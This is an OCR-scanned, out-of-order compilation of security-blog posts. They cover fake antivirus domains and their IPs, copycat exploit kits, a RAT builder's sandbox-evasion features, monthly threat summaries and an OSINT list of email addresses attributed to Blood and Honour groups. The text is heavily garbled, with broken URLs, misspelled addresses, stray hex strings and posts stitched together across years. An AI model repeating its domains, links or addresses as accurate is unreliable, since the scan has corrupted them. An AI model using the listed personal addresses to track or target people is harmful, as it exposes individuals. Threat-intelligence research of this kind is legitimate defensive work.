388810eb6ec85227c45b671b2a0d0e64e4db0f7c534fc6e8e12be22b59924F47 
7£546328f073f76097277b84a9d117c5a6414948dbafe3a535980e81347cbd64 
426455c87bd3dca6ce0bcd05e6c9e5ad450cb02d25658fee7 6fcf31c0f32c27b 
5aca56445a778ab328f3086ff7a06823a66518226966f0c9f1723alc740fOdff 
4e839b34c9d5b664e89 76d9ac1280c227122c5405ef03ecf2eb2f9261e27887b 
092afaa4d7ea20bf0327b8b9688f26fc4590c1de946542df20b617b1bc768400 
ef5d7bf437ed03486bba83bfelb4a38da62bbe40878e9318bf53c2f5725a39d2 
d4cf88d5c22fe052591df8dab551006c4813993ef4e9ac2a7cc2fadela44f2cc 
bca421826f2f2e95a0b01d2e429f51027c84a98e2f94d23781bc7b3d7ela7225 
ae44ad7b277eeflb7e028bc112a842ea15bf2322926335f113e70768a278086c 
1Lle5bbfd28f6e16b7b714b38665277b4bfcb9472b45dbc8d077af8b0cf52e891 
5b2c02c09d6519b62ee3651b9dafcd9d3c85869b315e6c67f68a1b57196d0ad6 


Stay tuned! 


1. https: //blogger. googleusercontent.com/img/a/AVvXsEj j5SZ4M07f 10FD20YiftR2SlyFD5pE2Dq_pq5F Ji JLRD5i7VG3CJq7KE 
DdPUIHeLb-r_pJOOQCoL2GE4u4A8L90i JMfI7buvf jOBso3tFeJf£DZ 


ttps://documents.trendmicro.com/assets/white_papers/wp-void-balaur-tracking-a-cybermercenarys-activities. 


18.1.3 Sample Portfolio of Dancho Danchev’s Personal and Conference Event Photos 
- A Compilation (2022-01-20 20:34) 


Recisc 


[1] 


Dear blog readers, 


I’ve decided to share with everyone a personal conference and event photos compilation with 
the idea to assist everyone and assist everyone in catching up in terms of what I’ve been up 
to in terms of conference and event presentations. 


Sample Dancho Danchev Personal Conference and Event Photos Compilation: 
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antivirus777 .com 
antivirusq .net 
antivirusr .net 
antivirust .net 
antivirusw .net 
antivirusu .net 


expressantivirus2009 .com 


spywarezscan .net 
antispywareq .net 
free-anti-spywaree .net 
avcheckyourpc .net 


“ Doctor Anitvirus 2008 


a 
Doctor Antivirus 2008 


? Syster 
Securi 
Privac 


Update 


@ |S Kl 


“« Settin 


tis highly recommended that you remove all the threats from your computer immediately. 
To remove these threats immediately. vou need to register Doctor Antivirus 2008 


spyware (5), tracking cookies (7). 
These harmful programs can cause: 


x] System crash 

€} Permanent Data Loss 
Ww System startup failures 
x] System slowdown 

€ Internet connection loss 


x) Infecting other computer on your network 


To do so, cick Remove all threats below. 


software-for-me08 .com - 


software-for-me-08 .com 


WARNING 40 infections found !!! 


Last scan detected malicious programs (4), viruses (6), adware (18), 


Continue unprotected | 


(78.157.143.250) 


softwarefor-me2008 .com 
softwarefor-me-2008 .com 


software-forme08 .com 


doctor2antivirus .com - (217.112.94.226; 87.248.163.56) 


doctor5antivirus .com 
doctor6antivirus .com 
doctor7antivirus .com 


x ©) Support 
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doctor8antivirus .com 
doctorantivirus2008a .com 
doctor-antivirus .com 
bcodecnow .net 


mysoftwarefreezone .com - (91.203.92.97) 
hotvid44 .com 
totsec2009 .com 
getdefender2009 .com 
totalsecure2009 .com 
myveryprivatevid .com 
mustseethatvid .com 
onlythebestvid .com 
ie-antivirus-order .com 
ie-anti-virus .com 
secure-order-box .com 


secureexpertcleaner .com - (89.149.227.50) 
bestxpclean2008 .com 

virusremover2008 .com 

registrydoctor2008 .com 
securefileshredder .com 
hypersecurefileshredder .com 
bestsecureexpertcleaner .com 


getdefender2009 .com - (58.65.238.34) 
malwarebell .com 

free-viruscan .com 

tmptmpservvv .com 
cometoseemyshow .com 


getneededsoftware .com - (91.203.93.25) 
gettotalsec2008 .com 

thedownloadvid .com 
scan.pc-antispyware-scanner .com 
totalsecure2009 .com 


wista-antivirus2009 .com - (216.255.179.203) 
usawindowsupdates .com - (85.17.143.213) 
mswindowsupdates .com 


The campaigns and the hosting providers are continuously monitored, especially taking 
into consideration the fact that the domains are already appearing in Alexa’s web rankings 
with sudden peaks of traffic. 


Related posts: 

[4]Fake Security Software Domains Serving Exploits 

[5]A Diverse Portfolio of Fake Security Software - Part Four 
[6]A Diverse Portfolio of Fake Security Software - Part Three 
[7]A Diverse Portfolio of Fake Security Software - Part Two 
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[8]Localized Fake Security Software 

[9]Diverse Portfolio of Fake Security Software 
[10]Got Your XPShield Up and Running? 

[11]Fake PestPatrol Security Software 

[12]RBN’s Fake Security Software 

[13]Lazy Summer Days at UkrTeleGroup Ltd 
[14]Geolocating Malicious ISPs 

[15]The Malicious ISPs You Rarely See in Any Report 


1. http: //ddanchev. blogspot .com/2008/08/diverse-portfolio-of-fake-security_25.html 


. http: //ddanchev. blogspot .com/2008/04/localized-fake-security-software. html 


. http: //ddanchev.blogspot .com/2008/08/fake-security-software-domains-serving .htm 


. http: //ddanchev. blogspot . com/2008/08/fake-security-software-domains-serving .htm 


2 
3 
4 
5. http: //ddanchev.blogspot .com/2008/08/diverse-portfolio-of-fake-security_25.htm 
6. http: //ddanchev. blogspot . com/2008/08/diverse-portfolio-of-fake-security_20.htm 
7 
8 
9 


. http://ddanchev. blogspot . com/2008/08/diverse-portfolio-of-fake-security.htm 


| http://adanchey blogspot. con/2008/04/localized-fake-security-sof tare. html 
_ http: //adanchey blogspot. con/2007/12/asverse-portfolio-of~fake-security heal 
10, http: //ddanchev. blogspot .con/7008/06/got~your~xpshielé-up-and-runing html 

_ http: //adanchev blogspot .con/2008/05/ fake-pestpatrol- security-software. html 

12, rtp: //ddanchev. blogspot .con/2007/10/rbns-fake- security- software. hea] 

_ http: //adanchev blogspot .con/2008/07/tazy- summer -days-at-ukrtelegroup Ids. ital 


14. http://ddanchev. blogspot .com/2008/02/geolocating-malicious-isps.htm 


. http://ddanchev. blogspot .com/2008/06/malicious-isps-you-rarely-see-in-any.htm 


4.9.2 Copycat Web Malware Exploitation Kits are Faddish (2008-09-03 13:27) 


|| O6mujas cratuctuxa || Crpaxz: || Pehepanz || Samegurme IP || Cxayenxtie IP || Ounctutes || Berit || 


O6waa cTaTucTuKa Top10 ctpax 

|Beero xocTos 92 1) Russian Federation 3? 
|Beero sarpy20x 10 |= Hungary 6 
Tpobue 10.86% =) Czech Republic 6 
\Hpobue no IE 24.39% |Z Ukraine 5 
Cratuctuxa no 6paysepam [e2) Australia 4 
\MSIE 41 (Exypt 3 
|MSIE 7 23 3 Germany 3 
|Firefox 16 | United States 3 
|Opera 2 x Unknown 3 
| CrametnKa no OC (i Poland 2 
| Windows ae «* Hosted by Lgbiin - your Free WebHost 
Windows XP SP2 34 | 

Unknown 5 | 

| Windows 2000 3 | 

Windows 98 2 

| Linux 1 

FreeBSD 1 
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For the cheap cybercriminals not wanting to invest a couple of thousand dollars into purchasing 
a cutting edge web malware exploitation kit - a pirated copy of which they would ironically 
obtained several moths later - with all the related and royalty free updates coming with it, 
there are always the copycat malware kits like this one offered for $100. 


Taking into consideration the proprietary nature of some of the kits, the business model 
of malware kits was mostly relying on their exclusive nature next to the number, and diversity 
of the exploits included in order to improve the infection rate. This simplistic assumption on 
behalf of the coders totally [L]ignored the possibility of their kits leaking to the general public, 
or copies of the kits ending up as a bargain in particular underground deal where the once 
highly exclusive kit was offered as a bonus. 


"Me too" web malware kits were a faddish way to enjoy the popularity of web malware 
kits like MPack and Icepack and try to cash in on that popularity by coming up average kits 
lacking any significant differentiation factors in the process. But just like the original and 
proprietary kits, whose authors didn’t envision the long term growth strategy of integrating 
different services into their propositions or the kits themselves, the authors of copycat 
malware kits didn’t bother considering the lack of long-term growth strategy for their re- 
leases. Branding in respect to releasing a Firepack malware kit to compete with Icepack which 
was originally released to compete with Mpack, has failed to achieve the desired results as well. 


And with malware kits now a commodity, and underground vendors excelling in a partic- 
ular practice with the long term objective to vertically integrate in their area of expertise - 
think spammers offering localization of messages into different languages and segmented 
email databases from a specific country - would we witness the emergence of [2]managed 
cybercrime services charging a premium for providing fresh dumps of credit card numbers, 
PayPal, Ebay accounts or whatever the buyer is requesting? 


That may well be the case in the long term. 


Related posts: 

[3]Web Based Botnet Command and Control Kit 2.0 

[4]DIY Botnet Kit Promising Eternal Updates 

[5]Pinch Vulnerable to Remotely Exploitable Flaw 

[6]The Zeus Crimeware Kit Vulnerable to Remotely Exploitable Flaw 
[7]The Small Pack Web Malware Exploitation Kit 

[8]Crimeware in the Middle - Zeus 

[9]The Nuclear Grabber Kit 

[10]The Apophis Kit 

[11]The FirePack Exploitation Kit Localized to Chinese 


[12]MPack and IcePack Localized to Chinese 


[13]The Icepack Exploitation Kit Localized to French 
[14]The FirePack Exploitation Kit - Part Two 

[15]The FirePack Web Malware Exploitation Kit 
[16]The WebAttacker in Action 

[17]Nuclear Malware Kit 
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nn SAAR SAILS 
Scan taken on 22 Jul 2008 08:58:49 (GMT) 
4-Squared| Found not 
Asti Found WORM/Saci cS 
Found Worm.Socks.es 
Avast Found Win32:AutoRun-AIU 
AVG Antivirus) Found SHeur. BWYA 


BitDefender! Found Socks.D 
ClamAV) Found nothi 
CPsecure} Found nothing 
Or.VW/eb| Found Trojan.Click.19624 


F-Prot Antivirus! Found nothing 
F-Secure Anti-Virus) Found P2P-Worm.Win32.Secks.es 
Fortinet] Found nothing 
Tkarus| Found Virus.Win32. 
Kaspersky Anti-Virus) Found P2P-Worm.Win32.Socks.es 
NOD32) Found 32 
Norman Virus Control Found W32/Smalidoor.cCGs 
Panda Antivirus! Found ! 


vBA32| Found aaa 
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[18]The Random JS Malware Exploitation Kit 
[19]Metaphisher Malware Kit Spotted in the Wild 

[20]The Black Sun Bot 

[21]The Cyber Bot 

[22]Google Hacking for MPacks, Zunkers and WebAttackers 
[23]The IcePack Malware Kit in Action 


. http://blogs.zdnet.com/security/?p=1598 


ttp://ddanchev.blogspot.com/2008/08/76service-cybercrime-as-service-going.html 


. http: //ddanchev. blogspot .com/2008/08/web-based-botnet- command-and-control.htm 


ttp://ddanchev. blogspot . com/2008/08/diy-botnet-kit-promising-eternal .htm 


. http: //ddanchev. blogspot .com/2008/08/pinch-vulnerable-to-remotely.htm 
. http: //ddanchev. blogspot .com/2008/06/zeus-crimeware-kit-vulnerable-to.htm 


ttp://ddanchev. blogspot .com/2008/05/small-pack-web-malware-exploitation-kit.htm 


. http: //ddanchev.blogspot .com/2008/04/crimeware-in-middle-zeus. htm 
. http: //ddanchev.blogspot.com/2006/11/nuclear-grabber-toolkit.htm 
10. http://ddanchev. blogspot .com/2008/02/rbns-phishing-activities.htm 


ttp://ddanchev. blogspot .com/2008/05/firepack-exploitation-kit-localized-to.htm 


ttp://ddanchev. blogspot .com/2007/10/mpack-and-icepack-localized-to-chinese.htm 
ttp://ddanchev. blogspot .com/2008/05/icepack-exploitation-kit-localized-to.htm 
ttp://ddanchev. blogspot .com/2008/04/firepack-exploitation-kit-part-two.htm 


ttp://ddanchev. blogspot .com/2008/02/firepack-web-malware-exploitation-kit .htm 


16. http://ddanchev. blogspot .com/2007/05/webattacker-in-action.htm 
17. http://ddanchev. blogspot .com/2007/08/nuclear-malware-kit .htm 


ttp://ddanchev. blogspot .com/2008/01/random- js-malware-exploitation-kit.htm 
ttp://ddanchev. blogspot .com/2007/11/metaphisher-malware-kit-spotted-in-wild.htm 
ttp://ddanchev. blogspot .com/2007/04/shots-from-malicious-wild-west-sample_7672.htm 
ttp://ddanchev. blogspot .com/2007/04/shots-from-malicious-wild-west-sample_20.htm 


22. http://ddanchev. blogspot .com/2007/09/google-hacking-for-mpacks-zunkers-and. html 


ttp://ddanchev. blogspot .com/2007/07/icepack-malware-kit-in-action.htm 


4.9.3 The Commoditization of Anti Debugging Features in RATs (2008-09-03 14:19) 
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EQ Connections | ‘ia Broadcast J” Settings | — Suid Server | 24° statistics | @ About _ 


Profle 

*E Basic Settings 

#) Startup Basic Settings : 
© vi Sama” 
(@ Fie Binder > Port : 3360 
5 Stealth > Connection Interval : 2 
fi Ant Debugging 

Gp Firewall Bypass installation : 

Build Server > Copy Server? : No 
- File Name : server.exe 

- Copy To : %WinDir%e\ 
> Offiine Keylogger : No 
> KeyLog File Name : log. txt 


Profiles > Process Mutex : EISQOPWS 


Ant Debuggers : 
E\Remote | > Ant Sand Boxie : No 

> Anti Norman Sandbox : No 

> Anti Anubis Sandbox : No 

> Anti Virtual PC : No 

> Ant YMiVare : No 

> Anti CW Sandox : No 


Create New Profile 


Profile Name : Remote 


Save Current Profile 


Loaded Profile : "Remote", Profile Loaded 


Status : Listening Started... 


Is ita [1]Remote Administration Tool (RAT) or is it [2] malware? That’s the [3]rhetorical question, 
since [4]RATs are not supposed to have built-in Virustotal submission for the newly generated 
server, antivirus software "killing" and [5]firewall bypassing capabilities. 


Taking a peek into some of commodity features aiming to make it harder to analyze the 
malware found in pretty much all the average DIY malware builders available at the disposal 
at the average script kiddies, one of the latest releases pitched as RAT while it’s malware 
clearly indicates the commoditization and availability of such modules : 


"- FWB (DLL Injection, The DLL is Never Written to Disk) 

- Decent Strong Traffic Encryption 

- Try to Unhook UserMode APIs 

- No Plugins/3rd Party Applications 

- 4 Startup Methods (Shell, Policies, Activex, UserInIt) 

- Set Maximum Connections 

- Built In File Binder 

- Multi Threaded Transfers 

- Anti Debugging (Anti VMware, Anti Sandboxie, Anti Norman Sandbox, Anti VirtualPC, Anti 
Anubis Sandbox, Anti CW Sandbox)" 
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Statistics 
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Scan taken on 22 Jul 2008 08:08:09 (GT) 


A-Souared] Founs nothing 
Antivr| Found TR/Dropper.Gen 

ArcaVe| Founc nothing 

Avast| Four o nothing 


AVG Antivirus) Found nothing 
BitDefende | Found nothing 
ClamAV) Found nothing 

| Founc nothing 


Or.Webd] Founs nothing 
F-Prot Antivirus) Found nothing 


-Secure Anti-Virus! Found Trojen.Win32.Pakes.jvm 
| Found nothing 

tharus| Four é Trajen-Dropper 
Kaspersky Anti-Virus] Found Trojan.Win32.Pekes.jem 


NOD32| Founs nothing 

Norman Virus Control] Founc nothing 

Panda Antivirus) Founs nothing 
Sophos Antivirus| Found Mal/Dropper-AC 

VieusBuster| Found nothing 

VBA32) Found nothing 
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Signup to Luxecash here 


” signup to Zangecash here 


> Signup to Vombacash here 


sd Signup to Waverevenue here 
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2 connections | (a Broadcast | J” Settings |) Buld Server | > Statstcs | @ About | 


Timestamp Action 
08:01:56 am Loading Settings... 
08:01:56 am Settings Loaded 
Total Connections : 4 08:01:56 am Maximum Connections Set To : 1000 
Alive Connections : 4 08:01:58 am Listening Started... 
Dead Connections : 0 08:01:58 am Connection Established 
08:01:58 am Checking Password... 
08:01:58 am Password Correct, Connection Accepted 
08:01:59 am Connection Established 
08:01:59 am Checking Password... 
08:01:59 am Password Correct, Connection Accepted 
08:01:59 am Connection Established 
08:01:59 am Checking Password... 
08:01:59 am Password Correct, Connection Accepted 
08:02:04 am Connection Established 
08:02:05 am Checking Password... 
08:02:05 am Password Correct, Connection Accepted 


Connections 


Malware coders or "malware modulators"? With the currently emerging [6]malware as a web 
service toolkits porting common malware tools to the web, drag and drop web interfaces for 
malware building are [7]definitely in the works. 


http: //ddanchev.blogspot .com/2007/08/rats-or-malware .htm 


http: //ddanchev. blogspot .com/2007/07/shark2-rat-or-malware.htm 
http: //ddanchev.blogspot .com/2007/08/shark-2-diy-malware .htm 


. http://ddanchev. blogspot .com/2007/12/shark-malware-new-versions- coming. htm 


http: //ddanchev.blogspot .com/2007/10/multiple-firewalls-bypassing.htm 
http: //ddanchev.blogspot .com/2007/08/malware-as-web-service.htm 
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http://ddanchev. blogspot .com/2008/07/coding-spyware-and-malware-for-hire htm 


4.9.4 Summarizing Zero Day’s Posts for August (2008-09-04 14:18) 
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Here’s a concise summary of all of my posts at [1]Zero Day for August. If interested, consider 
going through [2]July’s summary, subscribe yourself to [3]my personal feed, or [4]Zero Day’s 
main feed, and stay informed. 


Some of the notable articles are - [5]Today’s assignment : Coding an undetectable mal- 
ware ; [6]Coordinated Russia vs Georgia cyber attack in progress and [7]lInside India’s 
CAPTCHA solving economy. 


01. [8]Cuil’s stance on privacy - "We have no idea who you are" 

02. [9]Phishers increasingly scamming other phishers 

03. [10]Today’s assignment : Coding an undetectable malware 

04. [11]Consumer Reports urges Mac users to dump Safari, cites lack of phishing protection 
05. [12]Fake CNN news items malware campaign spreading rapidly 

06. [13]CNET’s Clientside developer blog serving Adobe Flash exploits 

07. [14]Coordinated Russia vs Georgia cyber attack in progress 

08. [15]Researcher discovers Nokia S40 security vulnerabilities, demands 20,000 euros to 
release details 

09. [16]lntel proactively fixes security flaws in its chips 

10. [17]1.5m spam emails sent from compromised University accounts 

11. [18]Fortune 500 companies use of email spoofing countermeasures declining 

12. [19]China busts hacking ring, managed to penetrate 10 gov’t databases 
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13. [20]Scammers caught backdooring chip and PIN terminals 

14. [21]SpamZa - opt in spamming service fighting to remain online 

15. [22]FEMA’s PBX network hacked, over 400 calls made to the Middle East 
16. [23]Typosquatting the U.S presidential election - a security risk? 

17. [24]Hundreds of Dutch web sites hacked by Islamic hackers 

18. [25]Twitter’s "me too" anti-spam strategy 

19. [26]Malware detected at the International Space Station 

20. [27]Taiwan busts hacking ring, 50 million personal records compromised 
21. [28]MSN Norway serving Flash exploits through malvertising 

22. [29]Inside India’s CAPTCHA solving economy 


. http://blogs .zdnet.com/securit 


ttp://ddanchev.blogspot.com/2008/08/summarizing-zero-days-posts-for-july.htm 


ttp://updates.zdnet.com/tags/dancho+danchev.htm1?t=0ks=0&0=1kmode=rss 


. http: //feeds.feedburner.com/zdnet/securit 
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. http://blogs.zdnet .com/security/?p=1670 

. http://blogs.zdnet.com/security/?p=183 

. http://blogs.zdnet .com/security/?p=1620 

. http: //blogs.zdnet .com/security/?p=164 
10. http://blogs.zdnet .com/security/?p=1649 
11. http://blogs.zdnet .com/security/?p=165 
12. http://blogs.zdnet .com/security/?p=165 
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15. http://blogs.zdnet .com/security/?p=1712 
16. http://blogs.zdnet .com/security/?p=171 
17. http://blogs.zdnet .com/security/?p=172 
18. http://blogs.zdnet .com/security/?p=174 
19. http://blogs.zdnet .com/security/?p=174 
20. http://blogs .zdnet.com/security/?p=1750 
21. http://blogs.zdnet.com/security/?p= l 
22. http://blogs.zdnet.com/security/?p=176 
23. http://blogs.zdnet.com/security/?p=1782 
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25. http://blogs.zdnet .com/security/?p=1796 
26. http://blogs.zdnet .com/security/?p=1806 
27. : : ; ?p= 

28. http://blogs.zdnet.com/security/?p= 

29. http://blogs.zdnet.com/security/?p=183 


4.9.5 Summarizing August’s Threatscape (2008-09-10 09:49) 
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Dancho Danchev's Blog - Mind Streams of 


Information Security Knowledge 


in the overwhelming sea of information, access to theely, lecsightful and independent open-source intedigence 
(OSINT) anatyses ts crucial for maintaining the necessary situational awareness to stay on the top of emerging 
security threats. This blog covers trends and fads, tactics and strategies, intersecting with thied-party 
research, speculations and real-time CYBERINT asseciuments, all packed with sarcastic attitude 


© Summarizing Zero Day's Posts for August 


Add Feed to RSS Reader 


RSS Feec Eve 


Following the previous summaries of [1]June’s and [2]July’s threatscape based on all the 
research published during the month, it’s time to summarize August’s threatscape. 


August’s threatscape was dominated by a huge increase of rogue security software do- 
mains made possible due to the easily obtainable templates for the sites, several malware 
campaigns targeting popular social networking sites, Russian’s organized cyberattack against 
Georgia with evidence on who’s behind it pointing to "everyone" and a few botnets dedicated 
to the attack making the whole process easy to outsource and turn responsibility into an 
"open topic", several new web based botnet management kits and tools found in the wild, 
evidence that the 76service may in fact be going mainstream since the concept of cybercrime 
as a service is already emerging, and, of course, a peek at India’s CAPTCHA solving economy, 
where the best comment I’ve received so far is that every site should embrace reCAPTCHA, so 
that while solving CAPTCHAs and participating in the abuse of these services in question, they 
would be also digitizing books. As usual, August was a pretty dynamic month for the middle 
of summer, with everyone excelling in their own malicious field. 


01. [3]McAfee’s Site Advisor Blocking n.runs AG - "for starters" 

False positives are rather common, especially when you’re aiming to protect the end user 
from himself and not let him gain access to "hacking tools", but you’re flagging security tools 
as badware and missing over half the SQL injected domains currently in the wild due to the 
fact that SiteAdvisor’s community still haven’t reviewed them - that’s not good 
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Related posts: 


[8]What You Get From "Peasant-aria Land" - A New Cyber Security Center - Behold Yourself To 
the Almighty Savior! - An Analysis 


[9]Dancho Danchev’s Disappearance - An Elaboration - Part Two 

[10]Dancho Danchev’s Disappearance 2010 - Official Complaint Against Republic of Bulgaria 
[11]Dancho Danchev’s Disappearance - 2010 - Official Complaint Against Republic of Bulgaria 
- Part Three 

[12]Dancho Danchev’s Disappearance - 2010 - Official Complaint Against Republic of Bulgaria 
- Part Two 

[13]Deep from the Trenches in Bulgaria - Part Three 

[14]Deep from the Trenches in Bulgaria - Part Two 

[15]How | Got Robbed and Beaten and Illegally Arrested by a Local Troyan Gang in Bulgaria 
[16]A Profile of a Bulgarian Kidnapper - Pavlin Georgiev (NaspauH Teoprues/Bacun Moes 
-ayescku/ABop Kones) - An Elaboration on Dancho Danchev’s Disappearance circa 2010 - An 
Analysis 
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ttps ://ddanchev.blogspot .com/2021/12/what-you-get-from-peasant-aria-land-new.htm 


9. https: //ddanchev.blogspot .com/2019/04/dancho-danchevs-2010-disappearance. htm 
10. https://ddanchev. blogspot .com/2019/11/dancho-danchevs-disappearance-2010.htm 
https ://ddanchev. blogspot .com/2021/03/dancho-danchevs-disappearance-2010.htm 


12. https://ddanchev. blogspot .com/2021/02/dancho-danchevs-disappearance-2010.htm 


https ://ddanchev. blogspot .com/2021/10/deep-from-trenches- in-bulgaria-part .htm 


. https: //ddanchev. blogspot .com/2021/09/deep-from-trenches- in-bulgaria-part-two.htm 


15. https://ddanchev. blogspot .com/2020/12/how-i-got-robbed-and-beaten-and.htm 


. https://ddanchev. blogspot .com/2021/11/a-profile-of-bulgarian-kidnapper-pavlin. htm 


18.1.7. My Participation in GCHQ’s Top Secret "Lovely Horse" Program to Monitor 
Hackers Online - An Elaboration (2022-01-23 06:57) 


[1] 


Dear blog readers, 


Did you know that you can actually find me in [2]Snowden’s archive by simply searching for 
my name where it will eventually lead you to a GCHQ Top Secret lawful surveillance program 
to monitor hackers online in specific their Twitter accounts? 
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[3] 


™= LOVELY HORSE © 


‘RT 
Vr 


Check out the following [4]Medium article where | do my best to elaborate on my 
participation in the Top Secret GCHQ Program "Lovely Horse". 


Stay tuned! 


1. bttps://blogger .googleusercontent . com/img/a/AVvXsEi TWXAS2sS£38YS3tL43WOz6WwTOAVMx5QqyZ1uHpNSLEYbo8uYF JaWmf 
2, httpe://search, edvardenowden.con/docs/LOVELTHORSE2015-02-04 neadoce_snowden_dod 
3, hotps:/ blogger. googleusercontent co/ing/a/AVVASEjWDkaveqhkoePL16v2g0%aVs,Dosgva0iP Vivi ius OV224yv6k 


https ://medium. com/@danchodanchev/my- involvement-in-the-top-secret-gchq-lovely-horse-program-and-the-exi 


stence-of-the-karma-police-daaf08b028a2 


18.1.8 Profiling the Blood and Honor Online Hate Group - An OSINT Analysis 
(2022-01-23 06:57) 


[1] 
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@ @ @ 


28sweden@hotmail.se highlander.eastcoas@hotmail.com bloodhonoursa@hotmail.com 


\<) ‘<] ‘<) 
28sweden.org sinhead-musc.com bloodandhonouraustralia.org 


As it’s been a while since I’ve last posted a quality update | wanted to take the time and effort 
and elaborate more on a current project of mine which is the "/nternational OSINT Journal 
Compilation on Online Terrorism Hate and Militarized Social Movements" which aims to expose 
and offer a massive information on currently active online terrorism hate and militarized social 
movements including actionable information on their online infrastructure. 


The International 
OSINT Journal 
Compilation on 

Online Tenrorism 


Hate and Militarized 
Social Movements 


Thee Definite OSINT Actionable Threat teceliigence 
Compiletion Guide ts 34 Lew Enforcement and the U.S 
betetiigeace Community intereatisaatly 


[2] Ditps:/ /ddaether diegspel.cem Emaik: danche 


In this post I’ll elaborate more and offer actionable intelligence on the online infrastructure of 
the Blood and Honor hate group with the idea to help you get a better perspective of their 
online infrastructure and possibly assist you in your cyber campaign attribution efforts. 


Sample personal email address accounts belonging to Blood and Honor International Groups 
include: 


bloodandhonouraustralis@hotmail[.]com 
bloodhonournsw@hotmail[.]com 
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bloodhonoursa@hotmaill[.]Jcom 
bloodhonourgld@hotmaill.]com 
bloodhonourvic@hotmaill[.]Jcom 
bloodhonourwa@hotmail[.]Jcom 
bhvilaanderen@hotmaill[.Jcom 
bh _wallonie@hotmail[.]Jcom 
bloodandhonour _bulgaria@abv[.]bg 
bandhcanada@yahoo[.]co[.]uk 
bhhexagone@hotmaill. ]fr 
bh _hellas@yahoo[.]gr 
support 28 zh@hotmail[.]com 
nederland@bloodhonournederland[.]com 
bloodandhonourhungary28@gmail[.Jcom 
isdm2010@gmail[.]Jcom 
vfs@libero[. Jit 
bhportugal28@yahoo[.]com 
brotherhood28serbia@hotmail[.]com 
28slov@gmail[.]Jcom 
bhe _bloodhonour@yahool[.]es 
28sweden@hotmaill[.]se 
ehukraine@bhukraine[. Jorg 
RAGEN[.]FURY@VIRGIN[.JNET 
axis@bloodandhonourworldwide[.]co[.]uk 
southlands28@hotmail[.]Jcom 
westcountrybloodandhonour@yahoo[. ]co[.]uk 
wycombe828@yahoo[.]com 
bandhcentral@bloodandhonourcentrall[. ]co[.]uk 
westmidsbandh@yahoo[.]co[.]uk 
bnsm@bnsm[. ]co[.]uk 
general@bloodandhonourworldwide[.]co[.]uk 
webmaster@bloodandhonourworldwide[.]co[.]uk 
s[. ]london-bh@hotmaill.]co[.]uk 
bloodandhonour[.]yorkshire@hotmail[.]co[.]uk 
northeastl488@hotmaill[.]co[.Juk 
highlanderdivision28@hotmail[.]co[.]uk 
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highlander[.]eastcoast@hotmail[.]Jcom ; 
bhamericandivision@yahoo[.]com 

bhwales@googlemail[.]Jcom 

ulsterbg@hotmail[.]co[.]uk 

Sample screenshots of logo of Blood and Honor Bulgaria include: 


Save the date 28.11.2020 
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18.1.9 Inquire About One-on-One or One-to-Many Virtual OSINT Training Today! 
(2022-01-23 07:10) 


[1] 


et ie |) 


"We make Cyber Intelligence = 
impact where no one has 
bef 


lore!” 


Our Services 


Technical Collection = ° 


Folks, 


Who’s been following my work on this blog since December, 2005? Are you interested 
in OSINT training? One-on-one or one-to-many sessions? Drop me a line today at dan- 
cho.danchev@hush.com on behalf of you or your organization or team and let’s help you take 
your team and organization to the next level. 


Sample portfolio of services which I’m currently offering can be also seen here - 
[2]https://disruptive-individuals.com including a copy of my [3]CV here including the following 
two sample of my work [4]here and [5]here. 


Check out some sample chapters from a free book on cyber attribution that I’m currently work- 
ing on to get a better idea of what | have in mind including my style and methodology: 


CYBER ATTACH ATTRIBUTION 
TECHRIQUES AND 
WETHODOLOGIES 


[6] 


[7] 
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Google is everything 


What is Google and how it can be applied to Cyber Attribution? 


[8] 


| en 


[9] 


[10] 


People OSINT Attribution Techniques 


How can OSINT be applied to People Cyber Attack Altribution Techniques? 


Wt ane fee exrst popeler aed recenemenbed ORINT tocbeipars bir dedeg penple oftrdnstiee fo cyber attack 
canpuigrs! 


[11] 
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[12] 


[13] 


[14] 


[15] 
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02. [4]The Twitter Malware Campaign Wants to Bank With You 

Twitter, just like every Web 2.0 application, isn’t and shouldn’t be treated as a unique platform 
for dissemination of malware, since it’s dissemination of malware "as usual". This particular 
malware campaign was not just executed by a lone gunman, but also, was taking advantage 
of a flaw allowing the author to add new followers potentially exposing them to the malicious 
links serving banker malware. For the the time being, MySpace, Facebook and Twitter accounts 
are the very last thing a malicious attacker is interesting in puchasing accounting data for, 
but how come? It’s all due to the oversupply of automatically registered accounts at other 
popular services, whose ecosystem of Internet properties empower cybercriminals with the 
ability to launch, host and distribute malware in between abusing the very same company’s 
services for the blackhat SEO campaign and redirection services. Theoretically, a distributed 
network build upon the services provided by a single company is faily easy to accomplish due 
to the single login authentication applied everywhere. A singly bogus Gmail account results 
in a blackhat SEO hosting blogspot account, flash based redirector hosted at Picasa, and a 
couple of thousands of spam emails sent automatically sent through Gmail in order to abuse 
it’s trusted email reputation 


03. [5]Compromised Web Servers Serving Fake Flash Players 

If aggressiveness matter, this campaign consisting of remotely injected redirection scripts at 
legitimate sites next to on purposely introduced malware oriented domains, was perhaps the 
most aggressive one during the month. Fake flash players, fake windows media players and 
fake youtube players are prone to increase as a social engineering tactic of choice due to the 
template-ization of malware serving sites for the sake of efficiency 


04. [6]Pinch Vulnerable to Remotely Exploitable Flaw 

With Zeus vulnerable to a remotely exploitable flaw allowing cybercriminals to hijack other cy- 
bercriminal’s Zeus botnet, private exploits targeting the still rather popular at least in respect 
to usefulness Pinch malware are leaking, allowing everyone including security researchers to 
take a peek at a particular campaign running unpatched Pinch gateway 


05. [7]Phishers Backdooring Phishing Pages to Scam One Another 

Backdooring phishing pages is perhaps the most minimalistic approach a cybercriminal 
wanting to scam another cybercriminal is going to take. The far more beneficial approach that 
I’ve encountered on a couple of occassions so far, would be to backdoor a proprietary web 
malware exploitation kit, release it in the wild, let them put the time and efforts into launching 
the campaigns, then hijack their botnet. In fact, the possibilities for backdooring copycat web 
malware exploitation kits in order to take advantage of the momentum while introducing a 
non-existent kit has always been there at the disposal of malicious attackers. One thing’s for 
sure - there’s no such thing as a free web malware exploitation kit, just like there isn’t such 
thing as a free phishing page 


06. [8]Email Hacking Going Commercial - Part Two 

In between the scammers promising the Moon and asking for anything between $20 to $250 
to hack into an email account, there are "legitimate" services taking advantage of web email 
hacking kits consisting of each and every known XSS vulnerability for a particular service 
in an attempt to increase the chances of the attacker. And given that the majority of these 
have been patched a long time ago, social engineering comes into play. Do these services 
have a future? Definitely as more and more people are in fact looking for and requesting such 
services, in fact, they’re willing to pay a bonus considering how exotic it is for them to have 
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[16] 


Stay tuned! 
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18.1.10 Exposing the Internet-Connected Infrastructure of the REvil Ransomware 
Gang - An In-Depth OSINT Analysis (2022-01-24 14:29) 


[1] 
& 


Dear blog readers, 


In this post I’ve decided to do an in-depth OSINT analysis on the recently busted REvil ran- 
